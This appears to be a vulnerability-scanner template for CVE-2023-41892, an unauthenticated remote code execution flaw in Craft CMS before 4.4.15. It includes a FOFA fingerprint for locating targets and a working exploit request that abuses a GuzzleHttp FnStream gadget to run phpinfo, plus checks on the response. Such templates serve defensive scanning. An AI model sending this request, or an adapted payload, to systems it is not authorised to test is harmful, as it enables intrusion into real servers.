id: CVE-2023-41892

info:
  name: CraftCMS < 4.4.15 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  verified: true
  description: |-
    Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.
    FOFA: icon_hash="-47932290"
  reference:
    - https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
    - https://blog.calif.io/p/craftcms-rce
    - https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#4415---2023-07-03-critical
    - https://github.com/craftcms/cms/commit/7359d18d46389ffac86c2af1e0cd59e37c298857
    - https://github.com/craftcms/cms/commit/a270b928f3d34ad3bd953b81c304424edd57355e
  tags: cve,cve2023,rce,unauth,craftcms
  created: 2023/09/21

rules:
  r0:
    request:
      method: POST
      path: /index.php
      body: |
        action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
    expression: |
      response.status == 200 && 
      response.body.ibcontains(b"PHP Credits") &&
      response.body.ibcontains(b"PHP Group") &&
      response.body.ibcontains(b"CraftCMS")
expression: r0()